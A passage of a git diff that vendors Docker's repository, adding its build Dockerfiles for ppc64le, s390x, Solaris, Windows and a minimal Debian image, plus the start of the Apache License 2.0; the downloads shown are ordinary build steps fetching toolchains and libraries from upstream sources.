https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install seccomp: the version shipped in jessie is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + + +# Install Go +# NOTE: official ppc64le go binaries weren't available until go 1.6.4 and 1.7.4 +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. 
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which 
need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + ppc64le/buildpack-deps:jessie@sha256:902bfe4ef1389f94d143d64516dd50a2de75bca2e66d4a44b1d73f63ddf05dda \ + ppc64le/busybox:latest@sha256:38bb82085248d5a3c24bd7a5dc146f2f2c191e189da0441f1c2ca560e3fc6f1b \ + ppc64le/debian:jessie@sha256:412845f51b6ab662afba71bc7a716e20fdb9b84f185d180d4c7504f8a75c4f91 \ + ppc64le/hello-world:latest@sha256:186a40a9a02ca26df0b6c8acdfb8ac2f3ae6678996a838f977e57fac9d963974 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . 
/go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.s390x b/vendor/github.com/docker/docker/Dockerfile.s390x new file mode 100644 index 0000000000..ba94bc70aa --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.s390x @@ -0,0 +1,190 @@ +# This file describes the standard way to build Docker on s390x, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.s390x . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM s390x/gcc:6.1 + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends + +# glibc in Debian has a bug specific to s390x that won't be fixed until Debian 8.6 is released +# - https://github.com/docker/docker/issues/24748 +# - https://sourceware.org/git/?p=glibc.git;a=commit;h=890b7a4b33d482b5c768ab47d70758b80227e9bc +# - https://sourceware.org/git/?p=glibc.git;a=commit;h=2e807f29595eb5b1e5d0decc6e356a3562ecc58e +RUN echo 'deb http://httpredir.debian.org/debian jessie-proposed-updates main' >> /etc/apt/sources.list.d/pu.list \ + && apt-get update \ + && apt-get install -y libc6 \ + && rm -rf 
/var/lib/apt/lists/* + +# Install seccomp: the version shipped in jessie is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support s390x properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git 
/go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT 
e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor selinux seccomp + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + s390x/buildpack-deps:jessie@sha256:4d1381224acaca6c4bfe3604de3af6972083a8558a99672cb6989c7541780099 \ + s390x/busybox:latest@sha256:dd61522c983884a66ed72d60301925889028c6d2d5e0220a8fe1d9b4c6a4f01b \ + s390x/debian:jessie@sha256:b74c863400909eff3c5e196cac9bfd1f6333ce47aae6a38398d87d5875da170a \ + s390x/hello-world:latest@sha256:780d80b3a7677c3788c0d5cd9168281320c8d4a6d9183892d8ee5cdd610f5699 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. 
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.simple b/vendor/github.com/docker/docker/Dockerfile.simple new file mode 100644 index 0000000000..8eeb3d96bb --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.simple @@ -0,0 +1,73 @@ +# docker build -t docker:simple -f Dockerfile.simple . +# docker run --rm docker:simple hack/make.sh dynbinary +# docker run --rm --privileged docker:simple hack/dind hack/make.sh test-unit +# docker run --rm --privileged -v /var/lib/docker docker:simple hack/dind hack/make.sh dynbinary test-integration-cli + +# This represents the bare minimum required to build and test Docker. 
+ +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Compile and runtime deps +# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#build-dependencies +# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#runtime-dependencies +RUN apt-get update && apt-get install -y --no-install-recommends \ + btrfs-tools \ + build-essential \ + curl \ + cmake \ + gcc \ + git \ + libapparmor-dev \ + libdevmapper-dev \ + libsqlite3-dev \ + \ + ca-certificates \ + e2fsprogs \ + iptables \ + procps \ + xfsprogs \ + xz-utils \ + \ + aufs-tools \ + vim-common \ + && rm -rf /var/lib/apt/lists/* + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install Go +# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines +# will need updating, to avoid errors. Ping #docker-maintainers on IRC +# with a heads-up. +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go +ENV CGO_LDFLAGS -L/lib + +# Install runc, containerd, tini and docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh runc containerd tini proxy + +ENV AUTO_GOPATH 1 +WORKDIR /usr/src/docker +COPY . 
/usr/src/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.solaris b/vendor/github.com/docker/docker/Dockerfile.solaris new file mode 100644 index 0000000000..bb342e5e6a --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.solaris @@ -0,0 +1,20 @@ +# Defines an image that hosts a native Docker build environment for Solaris +# TODO: Improve stub + +FROM solaris:latest + +# compile and runtime deps +RUN pkg install --accept \ + git \ + gnu-coreutils \ + gnu-make \ + gnu-tar \ + diagnostic/top \ + golang \ + library/golang/* \ + developer/gcc-* + +ENV GOPATH /go/:/usr/lib/gocode/1.5/ +ENV DOCKER_CROSSPLATFORMS solaris/amd64 +WORKDIR /go/src/github.com/docker/docker +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.windows b/vendor/github.com/docker/docker/Dockerfile.windows new file mode 100644 index 0000000000..652d07275e --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.windows @@ -0,0 +1,267 @@ +# escape=` + +# ----------------------------------------------------------------------------------------- +# This file describes the standard way to build Docker in a container on Windows +# Server 2016 or Windows 10. +# +# Maintainer: @jhowardmsft +# ----------------------------------------------------------------------------------------- + + +# Prerequisites: +# -------------- +# +# 1. Windows Server 2016 or Windows 10 with all Windows updates applied. The major +# build number must be at least 14393. This can be confirmed, for example, by +# running the following from an elevated PowerShell prompt - this sample output +# is from a fully up to date machine as at mid-November 2016: +# +# >> PS C:\> $(gin).WindowsBuildLabEx +# >> 14393.447.amd64fre.rs1_release_inmarket.161102-0100 +# +# 2. Git for Windows (or another git client) must be installed. https://git-scm.com/download/win. +# +# 3. The machine must be configured to run containers. 
For example, by following +# the quick start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or +# https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md +# +# 4. If building in a Hyper-V VM: For Windows Server 2016 using Windows Server +# containers as the default option, it is recommended you have at least 1GB +# of memory assigned; For Windows 10 where Hyper-V Containers are employed, you +# should have at least 4GB of memory assigned. Note also, to run Hyper-V +# containers in a VM, it is necessary to configure the VM for nested virtualization. + +# ----------------------------------------------------------------------------------------- + + +# Usage: +# ----- +# +# The following steps should be run from an (elevated*) Windows PowerShell prompt. +# +# (*In a default installation of containers on Windows following the quick-start guidance at +# https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start, +# the docker.exe client must run elevated to be able to connect to the daemon). +# +# 1. Clone the sources from github.com: +# +# >> git clone https://github.com/docker/docker.git C:\go\src\github.com\docker\docker +# >> Cloning into 'C:\go\src\github.com\docker\docker'... +# >> remote: Counting objects: 186216, done. +# >> remote: Compressing objects: 100% (21/21), done. +# >> remote: Total 186216 (delta 5), reused 0 (delta 0), pack-reused 186195 +# >> Receiving objects: 100% (186216/186216), 104.32 MiB | 8.18 MiB/s, done. +# >> Resolving deltas: 100% (123139/123139), done. +# >> Checking connectivity... done. +# >> Checking out files: 100% (3912/3912), done. +# >> PS C:\> +# +# +# 2. Change directory to the cloned docker sources: +# +# >> cd C:\go\src\github.com\docker\docker +# +# +# 3. 
Build a docker image with the components required to build the docker binaries from source +# by running one of the following: +# +# >> docker build -t nativebuildimage -f Dockerfile.windows . +# >> docker build -t nativebuildimage -f Dockerfile.windows -m 2GB . (if using Hyper-V containers) +# +# +# 4. Build the docker executable binaries by running one of the following: +# +# >> docker run --name binaries nativebuildimage hack\make.ps1 -Binary +# >> docker run --name binaries -m 2GB nativebuildimage hack\make.ps1 -Binary (if using Hyper-V containers) +# +# +# 5. Copy the binaries out of the container, replacing HostPath with an appropriate destination +# folder on the host system where you want the binaries to be located. +# +# >> docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe C:\HostPath\docker.exe +# >> docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe C:\HostPath\dockerd.exe +# +# +# 6. (Optional) Remove the interim container holding the built executable binaries: +# +# >> docker rm binaries +# +# +# 7. (Optional) Remove the image used for the container in which the executable +# binaries are build. Tip - it may be useful to keep this image around if you need to +# build multiple times. Then you can take advantage of the builder cache to have an +# image which has all the components required to build the binaries already installed. +# +# >> docker rmi nativebuildimage +# + +# ----------------------------------------------------------------------------------------- + + +# The validation tests can either run in a container, or directly on the host. To run in a +# container, ensure you have created the nativebuildimage above. 
Then run one of the +# following from an (elevated) Windows PowerShell prompt: +# +# >> docker run --rm nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat +# >> docker run --rm -m 2GB nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat (if using Hyper-V containers) + +# To run the validation tests on the host, from the root of the repository, run the +# following from a Windows PowerShell prompt (elevation is not required): (Note Go +# must be installed to run these tests) +# +# >> hack\make.ps1 -DCO -PkgImports -GoFormat + +# ----------------------------------------------------------------------------------------- + + +# To run unit tests, ensure you have created the nativebuildimage above. Then run one of +# the following from an (elevated) Windows PowerShell prompt: +# +# >> docker run --rm nativebuildimage hack\make.ps1 -TestUnit +# >> docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit (if using Hyper-V containers) + + +# ----------------------------------------------------------------------------------------- + + +# To run all tests and binary build, ensure you have created the nativebuildimage above. Then +# run one of the following from an (elevated) Windows PowerShell prompt: +# +# >> docker run nativebuildimage hack\make.ps1 -All +# >> docker run -m 2GB nativebuildimage hack\make.ps1 -All (if using Hyper-V containers) + +# ----------------------------------------------------------------------------------------- + + +# Important notes: +# --------------- +# +# Don't attempt to use a bind-mount to pass a local directory as the bundles target +# directory. It does not work (golang attempts for follow a mapped folder incorrectly). +# Instead, use docker cp as per the example. +# +# go.zip is not removed from the image as it is used by the Windows CI servers +# to ensure the host and image are running consistent versions of go. +# +# Nanoserver support is a work in progress. 
Although the image will build if the +# FROM statement is updated, it will not work when running autogen through hack\make.ps1. +# It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently +# quit due to the use of console hooks which are not available. +# +# The docker integration tests do not currently run in a container on Windows, predominantly +# due to Windows not supporting privileged mode, so anything using a volume would fail. +# They (along with the rest of the docker CI suite) can be run using +# https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1. +# +# ----------------------------------------------------------------------------------------- + + +# The number of build steps below are explicitly minimised to improve performance. +FROM microsoft/windowsservercore + +# Use PowerShell as the default shell +SHELL ["powershell", "-command"] + +# Environment variable notes: +# - GO_VERSION must be consistent with 'Dockerfile' used by Linux. +# - FROM_DOCKERFILE is used for detection of building within a container. 
+ENV GO_VERSION=1.7.5 ` + GIT_VERSION=2.11.0 ` + GOPATH=C:\go ` + FROM_DOCKERFILE=1 + +RUN ` + $ErrorActionPreference = 'Stop'; ` + $ProgressPreference = 'SilentlyContinue'; ` + ` + Function Test-Nano() { ` + $EditionId = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name 'EditionID').EditionId; ` + return (($EditionId -eq 'ServerStandardNano') -or ($EditionId -eq 'ServerDataCenterNano') -or ($EditionId -eq 'NanoServer')); ` + }` + ` + Function Download-File([string] $source, [string] $target) { ` + if (Test-Nano) { ` + $handler = New-Object System.Net.Http.HttpClientHandler; ` + $client = New-Object System.Net.Http.HttpClient($handler); ` + $client.Timeout = New-Object System.TimeSpan(0, 30, 0); ` + $cancelTokenSource = [System.Threading.CancellationTokenSource]::new(); ` + $responseMsg = $client.GetAsync([System.Uri]::new($source), $cancelTokenSource.Token); ` + $responseMsg.Wait(); ` + if (!$responseMsg.IsCanceled) { ` + $response = $responseMsg.Result; ` + if ($response.IsSuccessStatusCode) { ` + $downloadedFileStream = [System.IO.FileStream]::new($target, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write); ` + $copyStreamOp = $response.Content.CopyToAsync($downloadedFileStream); ` + $copyStreamOp.Wait(); ` + $downloadedFileStream.Close(); ` + if ($copyStreamOp.Exception -ne $null) { throw $copyStreamOp.Exception } ` + } ` + } else { ` + Throw ("Failed to download " + $source) ` + }` + } else { ` + $webClient = New-Object System.Net.WebClient; ` + $webClient.DownloadFile($source, $target); ` + } ` + } ` + ` + setx /M PATH $('C:\git\bin;C:\git\usr\bin;'+$Env:PATH+';C:\gcc\bin;C:\go\bin'); ` + ` + Write-Host INFO: Downloading git...; ` + $location='https://github.com/git-for-windows/git/releases/download/v'+$env:GIT_VERSION+'.windows.1/PortableGit-'+$env:GIT_VERSION+'-64-bit.7z.exe'; ` + Download-File $location C:\gitsetup.7z.exe; ` + ` + Write-Host INFO: Downloading go...; ` + Download-File 
$('https://golang.org/dl/go'+$Env:GO_VERSION+'.windows-amd64.zip') C:\go.zip; ` + ` + Write-Host INFO: Downloading compiler 1 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/gcc.zip C:\gcc.zip; ` + ` + Write-Host INFO: Downloading compiler 2 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/runtime.zip C:\runtime.zip; ` + ` + Write-Host INFO: Downloading compiler 3 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/binutils.zip C:\binutils.zip; ` + ` + Write-Host INFO: Installing PS7Zip package...; ` + Install-Package PS7Zip -Force | Out-Null; ` + Write-Host INFO: Importing PS7Zip...; ` + Import-Module PS7Zip -Force; ` + New-Item C:\git -ItemType Directory | Out-Null ; ` + cd C:\git; ` + Write-Host INFO: Extracting git...; ` + Expand-7Zip C:\gitsetup.7z.exe | Out-Null; ` + cd C:\; ` + ` + Write-Host INFO: Expanding go...; ` + Expand-Archive C:\go.zip -DestinationPath C:\; ` + ` + Write-Host INFO: Expanding compiler 1 of 3...; ` + Expand-Archive C:\gcc.zip -DestinationPath C:\gcc -Force; ` + Write-Host INFO: Expanding compiler 2 of 3...; ` + Expand-Archive C:\runtime.zip -DestinationPath C:\gcc -Force; ` + Write-Host INFO: Expanding compiler 3 of 3...; ` + Expand-Archive C:\binutils.zip -DestinationPath C:\gcc -Force; ` + ` + Write-Host INFO: Removing downloaded files...; ` + Remove-Item C:\gcc.zip; ` + Remove-Item C:\runtime.zip; ` + Remove-Item C:\binutils.zip; ` + Remove-Item C:\gitsetup.7z.exe; ` + ` + Write-Host INFO: Creating source directory...; ` + New-Item -ItemType Directory -Path C:\go\src\github.com\docker\docker | Out-Null; ` + ` + Write-Host INFO: Configuring git core.autocrlf...; ` + C:\git\bin\git config --global core.autocrlf true; ` + ` + Write-Host INFO: Completed + +# Make PowerShell the default entrypoint +ENTRYPOINT ["powershell.exe"] + +# Set the working directory to the location of the sources +WORKDIR 
C:\go\src\github.com\docker\docker + +# Copy the sources into the container +COPY . . diff --git a/vendor/github.com/docker/docker/LICENSE b/vendor/github.com/docker/docker/LICENSE new file mode 100644 index 0000000000..8f3fee627a --- /dev/null +++ b/vendor/github.com/docker/docker/LICENSE @@ -0,0 +1,191 @@ + + Apache License + Version 2.0, January 2004 + https://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). 
+ + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. 
Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or 